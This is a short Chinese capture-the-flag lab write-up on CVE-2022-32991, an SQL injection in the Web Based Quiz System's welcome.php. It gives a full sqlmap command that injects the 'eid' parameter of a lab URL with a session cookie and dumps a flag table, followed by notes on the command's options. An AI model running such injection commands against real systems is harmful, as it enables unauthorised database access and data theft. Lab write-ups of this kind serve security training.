# 春秋云镜靶场 CVE-2022-32991 Web Based Quiz System SQL注入
介绍
- 该CMS的welcome.php中存在SQL注入攻击。
- 利用sqlmap爆破
pyload
发现在以下界面存在sql注入:
sql注入:
python sqlmap.py -u "http://eci-2ze1h3jmxc8kr9szxe90.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" --cookie="PHPSESSID=e6fd5of1njvnf7s8s53q3mu7vn" --batch -current-db "ctf" -table "flag" -T "flag" -C "flag" --dump
一些注意的总结:
-p #指定sqlmap注入的传参参数
--cookie="" #绕过身份验证
--random-agent="" 或 --user-agent="" #绕过客户端验证
--batch #默认后续sqlmap操作都为Y